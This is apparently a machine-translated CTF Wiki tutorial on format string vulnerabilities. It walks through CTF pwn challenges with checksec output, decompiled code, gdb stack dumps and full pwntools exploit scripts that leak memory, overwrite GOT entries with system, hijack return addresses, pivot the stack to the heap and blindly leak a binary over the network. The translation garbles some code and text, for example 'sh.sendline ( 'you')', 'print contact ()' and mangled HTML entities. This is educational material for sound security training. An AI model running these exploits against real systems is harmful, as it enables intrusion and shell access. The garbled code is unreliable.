EN | ZH

# Format string vulnerability example¶

The following is a description of some of the formatting vulnerabilities in the CTF. It is also a common use of formatted strings.

## 64-bit program format string vulnerability¶

### Principle¶

In fact, the 64-bit offset calculation is similar to 32-bit, which is the corresponding parameter. Only the first six parameters of the 64-bit function are stored in the corresponding registers. So in the format string vulnerability? Although we did not put data into the corresponding registers, the program will still parse the format according to the format of the format string.

### Examples¶

Here, we introduce the [pwn200 GoodLuck] (https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/fmtstr/2017-UIUCTF-pwn200-GoodLuck) in UIUCTF in 2017 as an example. . Since there is only a local environment, I have set a flag.txt file locally.

#### Determining protection¶

➜  2017-UIUCTF-pwn200-GoodLuck git:(master) ✗ checksec goodluck

Arch:     amd64-64-little

RELRO:    Partial RELRO

Stack:    Canary found

NX:       NX enabled

PIE:      No PIE (0x400000)


It can be seen that the program has NX protection and partial RELRO protection enabled.

#### 分析程序¶

It can be found that the vulnerability of the program is obvious

  for ( j = 0; j <= 21; ++j )

{

v5 = format [j];
if ( !v5 || v11[j] != v5 )

{

puts("You answered:");

printf(format);

puts("\nBut that was totally wrong lol get rekt");

fflush(_bss_start);

result = 0;

goto LABEL_11;

}

}


#### Determining the offset¶

We offset the following at printf, here we only focus on the code part and the stack part.

gef➤  b printf

Breakpoint 1 at 0x400640

gef➤  r

Starting program: /mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/2017-UIUCTF-pwn200-GoodLuck/goodluck

what's the flag

123456

You answered:

Breakpoint 1, __printf (format=0x602830 "123456") at printf.c:28

28 printf.c: There is no such file or directory.

─────────────────────────────────────────────────────────[ code:i386:x86-64 ]────

0x7ffff7a627f7 <fprintf+135>    add    rsp, 0xd8

0x7ffff7a627fe <fprintf+142> right
0x7ffff7a627ff                  nop

→ 0x7ffff7a62800 <printf+0>       sub    rsp, 0xd8

0x7ffff7a62807 <printf+7> test al, al
0x7ffff7a62809 <printf+9> mov QWORD PTR [rsp + 0x28], rsi
0x7ffff7a6280e <printf+14> mov QWORD PTR [rsp + 0x30], rdx
───────────────────────────────────────────────────────────────────────[ stack ]────

['0x7fffffffdb08', 'l8']

8

0x00007fffffffdb08│+0x00: 0x0000000000400890  →  <main+234> mov edi, 0x4009b8    ← $rsp 0x00007fffffffdb10│+0x08: 0x0000000031000001 0x00007fffffffdb18│+0x10: 0x0000000000602830 → 0x0000363534333231 ("123456"?) 0x00007fffffffdb20│ + 0x18: 0x0000000000602010 → &quot;You answered: \ ng&quot; 0x00007fffffffdb28│+0x20: 0x00007fffffffdb30 → "flag{11111111111111111" 0x00007fffffffdb30│+0x28: "flag{11111111111111111" 0x00007fffffffdb38│+0x30: "11111111111111" 0x00007fffffffdb40│+0x38: 0x0000313131313131 ("111111"?) ──────────────────────────────────────────────────────────────────────────────[ trace ]──── [#0] 0x7ffff7a62800 → Name: __printf(format=0x602830 "123456") [#1] 0x400890 → Name: main() ─────────────────────────────────────────────────────────────────────────────────────────────────  It can be seen that the offset on the stack corresponding to the flag is 5, and the offset is 4 except for the corresponding first behavior return address. In addition, since this is a 64-bit program, the first 6 parameters exist in the corresponding registers, and the fmt string is stored in the RDI register, so the offset of the address corresponding to the fmt string is 10. The order corresponding to %order$s in the fmt string is the order of the arguments after the fmt string, so we only need to type %9$s to get the contents of the flag. Of course, we have an easier way to use fmtarg in https://github.com/scwuaptx/Pwngdb to determine the offset of a parameter. gef➤ fmtarg 0x00007fffffffdb28 The index of format argument : 10  Note that we have to break at printf. #### Using the program¶ from pwn import * from LibcSearcher import * goodluck = ELF('./goodluck') if args['REMOTE']: sh = remote('pwn.sniperoj.cn', 30017) else: sh = process('./goodluck') payload = "%9$s"

print payload

##gdb.attach(sh)

sh.sendline(payload)

print sh.recv()

sh.interactive()


## hijack GOT¶

### Principle¶

In the current C program, the functions in libc are all jumped through the GOT table. In addition, the GOT entry corresponding to each libc function can be modified without enabling RELRO protection. Therefore, we can modify the GOT table content of one libc function to the address of another libc function to achieve control of the program. For example, we can modify the contents of the got item of printf to the address of the system function. Thus, the program actually executes the system function when it executes printf.

Suppose we override the address of function A as the address of function B, then this attack technique can be divided into the following steps.

• Determine the GOT table address of function A.

• The function A we used in this step is usually in the program, so we can find it by simply finding the address.

• Determine the memory address of function B

• This step usually requires us to find a way to leak the address of the corresponding function B.

• Write the memory address of function B to the GOT table address of function A.

• This step generally requires us to use the vulnerability of the function to trigger. The general use methods are as follows

• Write function: write function.

• ROP

text

pop eax; ret;           # printf@got -> eax

pop ebx; ret;           # (addr_offset = system_addr - printf_addr) -> ebx

add [eax] ebx; ret;     # [printf@got] = [printf@got] + addr_offset



• Format string to write at any address

### Examples¶

Here we take [pwn3] (https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/fmtstr/2016-CCTF-pwn3) in the 2016 CCTF as an example.

#### Determining protection¶

as follows

➜  2016-CCTF-pwn3 git:(master) ✗ checksec pwn3

Arch:     i386-32-little

RELRO:    Partial RELRO

Stack:    No canary found

NX:       NX enabled

PIE:      No PIE (0x8048000)


It can be seen that the program mainly turns on NX protection. We generally turn on ASLR protection by default.

#### 分析程序¶

First analyze the program, you can find that the program seems to mainly implement a password-registered ftp, with three basic functions: get, put, dir. Probably look at the code for each feature and find a format string vulnerability in the get function.

int get_file()

{

char dest; // [sp+1Ch] [bp-FCh]@5

char s1; // [sp+E4h] [bp-34h]@1

char *i; // [sp+10Ch] [bp-Ch]@3

printf("enter the file name you want to get:");

__isoc99_scanf("%40s", &s1);

if ( !strncmp(&s1, "flag", 4u) )

puts("too young, too simple");

for ( i = (char *)file_head; i; i = (char *)*((_DWORD *)i + 60) )

{

if ( !strcmp(i, &s1) )

{

strcpy (&amp; dest, i + 0x28);
return printf (&amp; dest);
}

}

return printf (&amp; dest);
}


#### Exploiting ideas¶

Since there is a format string vulnerability, we can determine the following ideas

• Bypass password
• Determine formatting string parameter offset
• Use put@got to get the put function address, and then get the corresponding version of libc.so, and then get the corresponding system function address.
• Modify the contents of puts@got to the address of system.
• When the program executes the puts function again, it actually executes the system function.

#### Vulnerability Program¶

as follows

from pwn import *

from LibcSearcher import LibcSearcher

##context.log_level = 'debug'

pwn3 = ELF (&#39;./pwn3&#39;)
if args['REMOTE']:

sh = remote('111', 111)

else:

sh = process('./pwn3')

def get(name):

sh.sendline('get')

sh.recvuntil('enter the file name you want to get:')

sh.sendline(name)

data = sh.recv()

return data

def put(name, content):

sh.sendline('put')

sh.recvuntil('please enter the name of the file you want to upload:')

sh.sendline(name)

sh.recvuntil('then, enter the content:')

sh.sendline(content)

def show_dir():

sh.sendline ( &#39;you&#39;)

tmp = 'sysbdmin'

name = ""

for i in tmp:

name += chr(ord(i) - 1)

## password

def password():

sh.recvuntil('Name (ftp.hacker.server:Rainism):')

sh.sendline(name)

##password

password()

## get the addr of puts
puts_got = pwn3.got['puts']

log.success('puts got : ' + hex(puts_got))

put('1111', '%8$s' + p32(puts_got)) puts_addr = u32(get('1111')[:4]) ## get addr of system libc = LibcSearcher("puts", puts_addr) system_offset = libc.dump('system') puts_offset = libc.dump('puts') system_addr = puts_addr - puts_offset + system_offset log.success('system addr : ' + hex(system_addr)) ## modify puts@got, point to system_addr payload = fmtstr_payload(7, {puts_got: system_addr}) put('/bin/sh;', payload) sh.recvuntil('ftp>') sh.sendline('get') sh.recvuntil('enter the file name you want to get:') ##gdb.attach(sh) sh.sendline('/bin/sh;') ## system('/bin/sh') show_dir() sh.interactive()  note • The offset I used when getting the address of the puts function is 8, because I want the first 4 bytes of my output to be the address of the puts function. In fact, the offset of the first address of the format string is 7. • Here I used the fmtstr_payload function in pwntools to get the results we hoped for. If you are interested, you can check the official documentation. For example, here fmtstr_payload(7, {puts_got: system_addr}) means that the offset of my format string is 7, I want to write the system_addr address at the puts_got address. By default it is written in bytes. ## hijack retaddr¶ ### Principle¶ It's easy to understand that we're going to use the format string vulnerability to hijack the return address of the program to the address we want to execute. ### Examples¶ Here we take [three white hat-pwnme_k0] (https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/fmtstr/three white hats-pwnme_k0) as an example for analysis. #### Determining protection¶ ➜ Three white hats - pwnme_k0 git: (master) ✗ checksec pwnme_k0 Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)  It can be seen that the program mainly opens NX protection and Full RELRO protection. This way we have no way to modify the got table of the program. #### 分析程序¶ A brief analysis, you know that the program seems to mainly implement a function similar to account registration, mainly modify the viewing function, and then found a format string vulnerability found in the viewing function. int __usercall sub_400B07 @ <eax> (char format @ <dil> , char formata, __int64 a3, char a4) { write(0, "Welc0me to sangebaimao!\n", 0x1AuLL); printf (&amp; formatata, &quot;Welc0me to sangebaimao! \ n&quot;); return printf (&amp; a4 + 4); }  The output is &a4 + 4. Let’s go back and find out that the password we read in is also  v6 = read(0, (char *)&a4 + 4, 0x14uLL);  Of course, we can also find that the username we read in is 20 bytes from the password.  puts("Input your username(max lenth:20): "); fflush(stdout); v8 = read(0, &bufa, 0x14uLL); if ( v8 && v8 <= 0x14u ) { puts("Input your password(max lenth:20): "); fflush(stdout); v6 = read(0, (char *)&a4 + 4, 0x14uLL); fflush(stdout); *(_QWORD *)buf = bufa; * (_ QWORD *) (buf + 8) = a3; *(_QWORD *)(buf + 16) = a4;  Ok, this is almost the same. In addition, you can also find that this account password is not paired and not paired. #### Using ideas¶ Our ultimate goal is to get the system's shell. We can find that in the given file, there is a function that directly calls system('bin/sh') at the address 0x00000000004008A6 (about this discovery, generally the program is now roughly take a look.). Then if we modify the return address of a function to this address, it is equivalent to getting the shell. Although the memory that stores the return address itself is dynamically changing, its address relative to rbp does not change, so we can use the relative address to calculate. Use ideas as follows • Determine the offset • Get the rbp and return address of the function • Get the address where the return address is stored based on the relative offset • Write the address of the execution system function call to the address where the return address is stored. #### Determining the offset¶ First, let's first determine the offset. Enter the user name aaaaaaaa, enter the password casually, at the printf(&a4 + 4) function that outputs the password under the breakpoint. Register Account first! Input your username(max lenth:20): aaaaaaaa Input your password(max lenth:20): %p%p%p%p%p%p%p%p%p%p Register Success!! 1.Sh0w Account Infomation! 2.Ed1t Account Inf0mation! 3.QUit sangebaimao:( >error options 1.Sh0w Account Infomation! 2.Ed1t Account Inf0mation! 3.QUit sangebaimao:( >1 ...  At this point the stack is ─────────────────────────────────────────────────────────[ code:i386:x86-64 ]──── 0x400b1a call 0x400758 0x400b1fe rdi, [rbp + 0x10] 0x400b23 mov eax, 0x0 → 0x400b28 call 0x400770 ↳ 0x400770 jmp QWORD PTR [rip+0x20184a] # 0x601fc0 0x400776 xchg ax, ax 0x400778 jmp QWORD PTR [rip+0x20184a] # 0x601fc8 0x40077e xchg ax, ax ────────────────────────────────────────────────────────────────────[ stack ]──── 0x00007fffffffdb40│+0x00: 0x00007fffffffdb80 → 0x00007fffffffdc30 → 0x0000000000400eb0 → push r15 ←$rsp, $rbp 0x00007fffffffdb48│+0x08: 0x0000000000400d74 → add rsp, 0x30 0x00007fffffffdb50│+0x10: "aaaaaaaa" ←$rdi

0x00007fffffffdb58│+0x18: 0x000000000000000a

0x00007fffffffdb60│+0x20: 0x7025702500000000

0x00007fffffffdb68│+0x28: "%p%p%p%p%p%p%p%pM\r@"

0x00007fffffffdb70│+0x30: "%p%p%p%pM\r@"

0x00007fffffffdb78│+0x38: 0x0000000000400d4d  →   cmp eax, 0x2


We can find that the user name we entered is in the third position on the stack, then the position of the format string itself is removed, and the offset is 5 + 3 = 8.

#### Change address¶

We will carefully observe the information of the stack at the breakpoint.

0x00007fffffffdb40│+0x00: 0x00007fffffffdb80  →  0x00007fffffffdc30  →  0x0000000000400eb0  →   push r15     ← $rsp,$rbp

0x00007fffffffdb48│+0x08: 0x0000000000400d74  →   add rsp, 0x30

0x00007fffffffdb50│+0x10: "aaaaaaaa"     ← $rdi 0x00007fffffffdb58│+0x18: 0x000000000000000a 0x00007fffffffdb60│+0x20: 0x7025702500000000 0x00007fffffffdb68│+0x28: "%p%p%p%p%p%p%p%pM\r@" 0x00007fffffffdb70│+0x30: "%p%p%p%pM\r@" 0x00007fffffffdb78│+0x38: 0x0000000000400d4d → cmp eax, 0x2  You can see that the second location on the stack stores the return address of the function (in fact, the value stored in the push rip when the show account function is called), and the offset in the format string is 7. At the same time, on the stack, the first element stores the rbp of the previous function. So we can get the offset 0x00007fffffffdb80 - 0x00007fffffffdb48 = 0x38. Then if we know the value of rbp, we know the address of the function return address. 0x0000000000400d74 is different from 0x00000000004008A6 with only 2 bytes lower, so we can only modify 2 bytes starting at 0x00007fffffffdb48. It should be noted here that on some newer systems (such as ubuntu 18.04), the program crash may occur when the return address is directly modified to 0x00000000004008A6. In this case, you can consider modifying the return address to 0x00000000004008AA, that is, directly calling system("/bin /sh") .text:00000000004008A6 sub_4008A6 proc near .text:00000000004008A6 ; __unwind { .text:00000000004008A6 push rbp .text:00000000004008A7 mov rbp, rsp .text:00000000004008AA <- here mov edi, offset command ; "/bin/sh" .text:00000000004008AF call system .text:00000000004008B4 pop rdi .text:00000000004008B5 pop rsi .text:00000000004008B6 pop rdx .text: 00000000004008B7 retn  #### Using the program¶ from pwn import * context.log_level="debug" context.arch="amd64" sh=process("./pwnme_k0") binary=ELF("pwnme_k0") #gdb.attach(sh) sh.recv() sh.writeline("1"*8) sh.recv() sh.writeline("%6$p")

sh.recv()

sh.writeline("1")

sh.recvuntil("0x")

ret_addr = int(sh.recvline().strip(),16) - 0x38

Success ( &quot;ret_addr:&quot; + Hex (ret_addr))

sh.recv()

sh.writeline("2")

sh.recv()

sh.sendline (p64 (ret_addr))
sh.recv()

#sh.writeline("%2214d%8$hn") #0x4008aa-0x4008a6 sh.writeline("%2218d%8$hn")

sh.recv()

sh.writeline("1")

sh.recv()

sh.interactive()


## Formatted string vulnerability on heap¶

### Principle¶

The so-called formatted string on the heap means that the formatted string itself is stored on the heap. This mainly increases the difficulty of getting the corresponding offset. In general, the formatted string is likely to be copied. On the stack.

### Examples¶

Here we take [contacts] (https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/fmtstr/2015-CSAW-contacts) in CSAW 2015 as an example.

#### Determining protection¶

➜  2015-CSAW-contacts git:(master) ✗ checksec contacts

Arch:     i386-32-little

RELRO:    Partial RELRO

Stack:    Canary found

NX:       NX enabled

PIE:      No PIE (0x8048000)


It can be seen that the program not only turns on NX protection but also turns on Canary.

#### 分析程序¶

A simple look at the program, found that the program, as the name describes, is a contact-related program that can create, modify, delete, and print contact information. And after reading it carefully, you can find a format string vulnerability when printing contact information.

int __cdecl PrintInfo(int a1, int a2, int a3, char *format)

{

printf("\tName: %s\n", a1);

printf("\tLength %u\n", a2);
printf("\tPhone #: %s\n", a3);

printf("\tDescription: ");

return printf(format);

}


Take a closer look and you can see that this format actually points to the heap.

#### Using ideas¶

Our basic purpose is to get the system's shell and get the flag. In fact, since there is a format string vulnerability, we should be able to control the program flow by hijacking the got table or controlling the return address of the program. But it is not very feasible here. The reasons are as follows

• The reason why we can't hijack got to control the program flow is because we found that only the printf function that can be output to our given string is common in the program. We only have to select it to construct /bin/sh to execute it. ('/bin/sh'), but the printf function is also used elsewhere, which will cause the program to crash directly.
• Secondly, it is not possible to directly control the program return address to control the program flow because we do not have a directly executable address to store our contents, and use the format string to write directly to the stack system__addr + 'bbbb ' + addr of '/bin/sh' doesn't seem to be realistic.

So what can we do? We also have the skills to talk about stack overflow before, stack pivoting. And here, what we can control happens to be heap memory, so we can move the stack to the heap. Here we use the leave command for stack migration, so before migration we need to modify the program to save the value of ebp to the value we want. Only then will esp become the value we want when we execute the leave instruction. At the same time, because we are using the format string to modify, so we have to know the address of the ebp store, and the address of the ebp stored in the PrintInfo function changes every time, and we can not know by other means. . However, the ebp value pushed into the stack in the program actually saves the address of the ebp value of the previous function, so we can modify the value of the saved ebp of the upper layer function, ie the upper upper layer function ( That is, the main function) ebp value. In this way, when the upper program returns, the operation of migrating the stack to the heap is implemented.

The basic idea is as follows

• First get the address of the system function
• Determine by libc database by leaking the address of a libc function.
• Construct a basic contact description as system_addr + 'bbbb' + binsh_addr
• Modify the ebp saved by the upper function (ie the ebp of the upper layer function) to the address -** of the storage system_addr.
• When the main program returns, the following operations will occur
• move esp, ebp, point esp to the address of system_addr -4
• pop ebp, point esp to system_addr
• ret, get the shell by pointing eip to system_addr.

#### Get the relevant address and offset¶

Here we mainly get the system function address, /bin/sh address, the address of the contact description stored on the stack, and the address of the PrintInfo function.

First, we get the system function address and /bin/sh address according to the libc_start_main_ret address stored on the stack (which is the function that will run when the main function returns). We construct the corresponding contact, then choose to output the contact information, and breakpoints at printf, and run until the printf function of the format string vulnerability, as follows

 → 0xf7e44670 <printf+0>       call   0xf7f1ab09 <__x86.get_pc_thunk.ax>

↳  0xf7f1ab09 <__x86.get_pc_thunk.ax+0> mov    eax, DWORD PTR [esp]

0xf7f1ab0c <__x86.get_pc_thunk.ax+3> ret

0xf7f1ab0d <__x86.get_pc_thunk.dx+0> mov    edx, DWORD PTR [esp]

0xf7f1ab10 <__x86.get_pc_thunk.dx+3> ret

───────────────────────────────────────────────────────────────────────────────────────[ stack ]────

['0xffffccfc', 'l8']

8

0xffffccfc│+0x00: 0x08048c27  →   leave      ← $esp 0xffffcd00│+0x04: 0x0804c420 → "1234567" 0xffffcd04│+0x08: 0x0804c410 → "11111" 0xffffcd08│+0x0c: 0xf7e5acab → <puts+11> add ebx, 0x152355 0xffffcd0c│+0x10: 0x00000000 0xffffcd10│+0x14: 0xf7fad000 → 0x001b1db0 0xffffcd14│+0x18: 0xf7fad000 → 0x001b1db0 0xffffcd18│+0x1c: 0xffffcd48 → 0xffffcd78 → 0x00000000 ←$ebp

──────────────────────────────────────────────────────────────────────────────────────────[ trace ]────

[#0] 0xf7e44670 → Name: __printf(format=0x804c420 "1234567\n")

[#1] 0x8048c27 → leave

[#2] 0x8048c99 → add DWORD PTR [ebp-0xc], 0x1

[# 3] 0x80487a2 → jmp 0x80487b3
[#4] 0xf7e13637 → Name: __libc_start_main(main=0x80486bd, argc=0x1, argv=0xffffce14, init=0x8048df0, fini=0x8048e60, rtld_fini=0xf7fe88a0 <_dl_fini>, stack_end=0xffffce0c)

[# 5] 0x80485e1 → holds
────────────────────────────────────────────────────────────────────────────────────────────────────

gef➤  dereference $esp 140 ['$esp', '140']

1

0xffffccfc│+0x00: 0x08048c27  →   leave      ← $esp gef➤ dereference$esp l140

['$esp', 'l140'] 140 0xffffccfc│+0x00: 0x08048c27 → leave ←$esp

0xffffcd00│+0x04: 0x0804c420  →  "1234567"

0xffffcd04│+0x08: 0x0804c410  →  "11111"

0xffffcd08│+0x0c: 0xf7e5acab  →  <puts+11> add ebx, 0x152355

0xffffcd0c│+0x10: 0x00000000

0xffffcd10│+0x14: 0xf7fad000  →  0x001b1db0

0xffffcd14│+0x18: 0xf7fad000  →  0x001b1db0

0xffffcd18│+0x1c: 0xffffcd48  →  0xffffcd78  →  0x00000000   ← $ebp 0xffffcd1c│+0x20: 0x08048c99 → add DWORD PTR [ebp-0xc], 0x1 0xffffcd20│+0x24: 0x0804b0a8 → "11111" 0xffffcd24│+0x28: 0x00002b67 ("g+"?) 0xffffcd28│+0x2c: 0x0804c410 → "11111" 0xffffcd2c│+0x30: 0x0804c420 → "1234567" 0xffffcd30│+0x34: 0xf7fadd60 → 0xfbad2887 0xffffcd34│+0x38: 0x08048ed6 → 0x25007325 ("%s"?) 0xffffcd38│+0x3c: 0x0804b0a0 → 0x0804c420 → "1234567" 0xffffcd3c│+0x40: 0x00000000 0xffffcd40│+0x44: 0xf7fad000 → 0x001b1db0 0xffffcd44│+0x48: 0x00000000 0xffffcd48│+0x4c: 0xffffcd78 → 0x00000000 0xffffcd4c│ + 0x50: 0x080487a2 → jmp 0x80487b3 0xffffcd50│+0x54: 0x0804b0a0 → 0x0804c420 → "1234567" 0xffffcd54│+0x58: 0xffffcd68 → 0x00000004 0xffffcd58│+0x5c: 0x00000050 ("P"?) 0xffffcd5c│+0x60: 0x00000000 0xffffcd60│+0x64: 0xf7fad3dc → 0xf7fae1e0 → 0x00000000 0xffffcd64│+0x68: 0x08048288 → 0x00000082 0xffffcd68│+0x6c: 0x00000004 0xffffcd6c│+0x70: 0x0000000a 0xffffcd70│+0x74: 0xf7fad000 → 0x001b1db0 0xffffcd74│+0x78: 0xf7fad000 → 0x001b1db0 0xffffcd78│+0x7c: 0x00000000 0xffffcd7c│+0x80: 0xf7e13637 → <__libc_start_main+247> add esp, 0x10 0xffffcd80│+0x84: 0x00000001 0xffffcd84│+0x88: 0xffffce14 → 0xffffd00d → "/mnt/hgfs/Hack/ctf/ctf-wiki/pwn/fmtstr/example/201[...]" 0xffffcd88│+0x8c: 0xffffce1c → 0xffffd058 → "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat[...]"  We can get it by simple judgment. 0xffffcd7c│+0x80: 0xf7e13637 → <__libc_start_main+247> add esp, 0x10  Stored is the return address of __libc_start_main, and uses fmtarg to get the corresponding offset. It can be seen that the offset is 32, then the offset from the format string is 31. gef➤ fmtarg 0xffffcd7c The index of format argument : 32  This way we can get the corresponding address. In turn, you can get the corresponding libc according to libc-database, and then get the system function address and /bin/sh function address. Second, we can determine that the address 0xffffcd2c of the formatted string stored on the stack is 11 relative to the format string, which is used to construct our contacts. Furthermore, we can see that the following address holds the call address of the upper function, and its offset from the format string is 6, so that we can directly modify the value of ebp stored in the upper function. 0xffffcd18│+0x1c: 0xffffcd48 → 0xffffcd78 → 0x00000000 ←$ebp


#### Constructing a contact to get the heap address¶

After learning the above information, we can use the following method to get the heap address and the corresponding ebp address.

[system_addr][bbbb][binsh_addr][%6$p][%11$p][bbbb]


To get the corresponding corresponding address. The latter bbbb is for the convenience of accepting strings.

Here, because the stack space requested by the function is the same as the free space, the ebp address we get will not change because we call it again.

In some environments, the system address will appear \x00, causing 0 truncation when printf will result in the inability to disclose both addresses, so you can modify the payload as follows:

[%6$p][%11$p][ccc][system_addr][bbbb][binsh_addr][dddd]


If the payload is modified to do this, you need to add a 12 offset to the heap. This ensures that the 0 truncation occurs after the leak.

#### Modify ebp¶

Since we need to execute the move command to assign ebp to esp and also need to execute pop ebp to execute the ret instruction, we need to modify ebp to store the value of system address -4. After pop ebp, the esp happens to point to the address of the save system, and the system function can be executed by executing the ret instruction.

We have already learned the ebp value we want to modify, and we know that the corresponding offset is 11, so we can construct the following payload to modify the corresponding value.

part1 = (heap_addr - 4) / 2

part2 = heap_addr - 4 - part1

payload = '%' + str(part1) + 'x%' + str(part2) + 'x%6$n'  #### Get the shell¶ At this time, after executing the format string function, exit to the upper function, we enter 5, exit the program will execute the ret instruction, you can get the shell. #### Using the program¶ from pwn import * from LibcSearcher import * contact = ELF('./contacts') ##context.log_level = 'debug' if args['REMOTE']: sh = remote(11, 111) else: sh = process('./contacts') def createcontact(name, phone, descrip_len, description): sh.recvuntil (&#39;&gt;&gt;&gt;&#39;) sh.sendline('1') sh.recvuntil('Contact info: \n') sh.recvuntil('Name: ') sh.sendline(name) sh.recvuntil('You have 10 numbers\n') sh.sendline(phone) sh.recvuntil('Length of description: ') sh.sendline(descrip_len) sh.recvuntil('description:\n\t\t') sh.sendline(description) def printcontact(): sh.recvuntil (&#39;&gt;&gt;&gt;&#39;) sh.sendline('4') sh.recvuntil('Contacts:') sh.recvuntil('Description: ') ## get system addr & binsh_addr payload = &#39;% 31$ paaaa&#39;
createcontact('1111', '1111', '111', payload)

print contact ()
libc_start_main_ret = int(sh.recvuntil('aaaa', drop=True), 16)

log.success('get libc_start_main_ret addr: ' + hex(libc_start_main_ret))

libc = LibcSearcher('__libc_start_main_ret', libc_start_main_ret)

libc_base = libc_start_main_ret - libc.dump('__libc_start_main_ret')

system_addr = libc_base + libc.dump('system')

binsh_addr = libc_base + libc.dump('str_bin_sh')

log.success('get system addr: ' + hex(system_addr))

log.success('get binsh addr: ' + hex(binsh_addr))

##gdb.attach(sh)

## get heap addr and ebp addr

payload = flat([

system_addr,

&#39;yyyah&#39;,
binsh_addr,

'%6$p%11$pcccc',

])

createcontact('2222', '2222', '222', payload)

print contact ()
sh.recvuntil('Description: ')

data = sh.recvuntil('cccc', drop=True)

data = data.split('0x')

print data

ebp_addr = int(data[1], 16)

heap_addr = int(data[2], 16)

## modify ebp

part1 = (heap_addr - 4) / 2

part2 = heap_addr - 4 - part1

payload = '%' + str(part1) + 'x%' + str(part2) + 'x%6$n' ##print payload createcontact('3333', '123456789', '300', payload) print contact () sh.recvuntil('Description: ') sh.recvuntil('Description: ') ##gdb.attach(sh) print 'get shell' sh.recvuntil (&#39;&gt;&gt;&gt;&#39;) ##get shell sh.sendline('5') sh.interactive()  In the case of system 0 truncation, exp is as follows: from pwn import * context.log_level="debug" context.arch="x86" io=process("./contacts") binary=ELF("contacts") libc=binary.libc def createcontact(io, name, phone, descrip_len, description): I sh = sh.recvuntil (&#39;&gt;&gt;&gt;&#39;) sh.sendline('1') sh.recvuntil('Contact info: \n') sh.recvuntil('Name: ') sh.sendline(name) sh.recvuntil('You have 10 numbers\n') sh.sendline(phone) sh.recvuntil('Length of description: ') sh.sendline(descrip_len) sh.recvuntil('description:\n\t\t') sh.sendline(description) def printcontact(io): I sh = sh.recvuntil (&#39;&gt;&gt;&gt;&#39;) sh.sendline('4') sh.recvuntil('Contacts:') sh.recvuntil('Description: ') # Gdb.attach (I) createcontact (io, &quot;1&quot;, &quot;1&quot;, &quot;111&quot;, &quot;% 31$ paaaa&quot;)
printcontact (I)
libc_start_main = int(io.recvuntil('aaaa', drop=True), 16)-241

log.success('get libc_start_main addr: ' + hex(libc_start_main))

libc_base=libc_start_main-libc.symbols["__libc_start_main"]

system=libc_base+libc.symbols["system"]

binsh=libc_base+next(libc.search("/bin/sh"))

log.success("system: "+hex(system))

log.success("binsh: "+hex(binsh))

payload = '%6$p%11$pccc'+p32(system)+'bbbb'+p32(binsh)+"dddd"

createcontact(io,'2', '2', '111', payload)

printcontact (I)
io.recvuntil (&#39;Description:&#39;)
data = io.recvuntil('ccc', drop=True)

data = data.split('0x')

print data

ebp_addr = int(data[1], 16)

heap_addr = int(data[2], 16)+12

log.success("ebp: "+hex(system))

log.success("heap: "+hex(heap_addr))

part1 = (heap_addr - 4) / 2

part2 = heap_addr - 4 - part1

payload = '%' + str(part1) + 'x%' + str(part2) + 'x%6$n' #payload=fmtstr_payload(6,{ebp_addr:heap_addr}) ##print payload createcontact(io,'3333', '123456789', '300', payload) printcontact (I) io.recvuntil (&#39;Description:&#39;) io.recvuntil (&#39;Description:&#39;) ##gdb.attach(sh) log.success("get shell") io.recvuntil (&#39;&gt;&gt;&gt;&#39;) ##get shell io.sendline ( &#39;5&#39;) io.interactive ()  It should be noted that this does not stabilize the shell because we have entered a string that is too long. But we have no way to control the address we want to enter in the front. It can only be this way. Why do you need to print so much? Because the format string is not on the stack, even if we get the address of the ebp that needs to be changed, there is no way to write this address to the stack, use the$ symbol to locate him; because there is no way to locate, there is no way to use l \ll and other ways to write this address, so only print a lot.

## Format string blind hit¶

### Principle¶

The so-called format string blind typing means that only the interactive ip address and port are given. The corresponding binary file is not given to let us perform pwn. In fact, this is similar to BROP, but BROP uses stack overflow, and here We are using a format string vulnerability. In general, we follow the steps below

• Determine the number of bits in the program
• Identify the location of the vulnerability -Use

Since I didn't find the source code after the game, I simply constructed two questions.

### Example 1 - Leaking Stack¶

Both the source and deployment files are placed in the corresponding folder [fmt_blind_stack] (https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/fmtstr/blind_fmt_stack).

#### Determine the number of programs¶

We randomly entered %p and the program echoed the following information.

➜  blind_fmt_stack git:(master) ✗ nc localhost 9999

%p

0x7ffd4799beb0

G�flag is on the stack%


Tell us that the flag is on the stack and that the program is 64-bit and that there should be a format string vulnerability.

#### Use¶

Then let's take a little test and see

from pwn import *

context.log_level = 'error'

def leak(payload):

sh = remote('127.0.0.1', 9999)

sh.sendline(payload)

data = sh.recvuntil('\n', drop=True)

if data.startswith('0x'):

print p64(int(data, 16))

sh.close()

i = 1

while 1:

payload = '%{}$p'.format(i) leak(payload) i += 1  Finally, I simply looked at the output and got the flag. //////// //////// \x00\x00\x00\x00\x00\x00\x00\xff flag {exam s_is_fla g}\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\xfe\x7f\x00\x00  ### Example 2 - Blind hijacking got¶ The source code and deployment files are already in the blind_fmt_got folder. #### Determine the number of programs¶ By simply testing, we found that this program is a format string vulnerability function, and the program is 64-bit. ➜ blind_fmt_got git:(master) ✗ nc localhost 9999 %p 0x7fff3b9774c0  This time, I didn't show it back. I tried it again and found that there was nothing wrong with it. Then we had to leak a wave of source programs. #### Determining the offset¶ Before the leak procedure, we still have to determine the offset of the format string, as follows ➜ blind_fmt_got git:(master) ✗ nc localhost 9999 aaaaaaaa%p%p%p%p%p%p%p%p%p aaaaaaaa0x7ffdbf920fb00x800x7f3fc9ccd2300x4006b00x7f3fc9fb0ab00x61616161616161610x70257025702570250x70257025702570250xa7025  Based on this, we can know that the starting address offset of the format string is 6. #### leaking binary¶ Since the program is 64-bit, we started leaking from 0x400000. In general, blind typing with a format string vulnerability can be read into the '\x00' character, otherwise it can't be revealed how to play, after that, the output must be truncated by '\x00', this is because The output functions of the format string exploit are truncated by '\x00'. . So we can use the leak code below. ##coding=utf8 from pwn import * ##context.log_level = 'debug' ip = "127.0.0.1" port = 9999 def leak(addr): # leak addr for three times num = 0 while num < 3: try: print 'leak addr: ' + hex(addr) sh = remote(ip, port) payload = '%00008$s' + 'STARTEND' + p64(addr)

#说明有\n, a new line appears
if '\x0a' in payload:

return None

sh.sendline(payload)

data = sh.recvuntil('STARTEND', drop=True)

sh.close()

return data

except Exception:

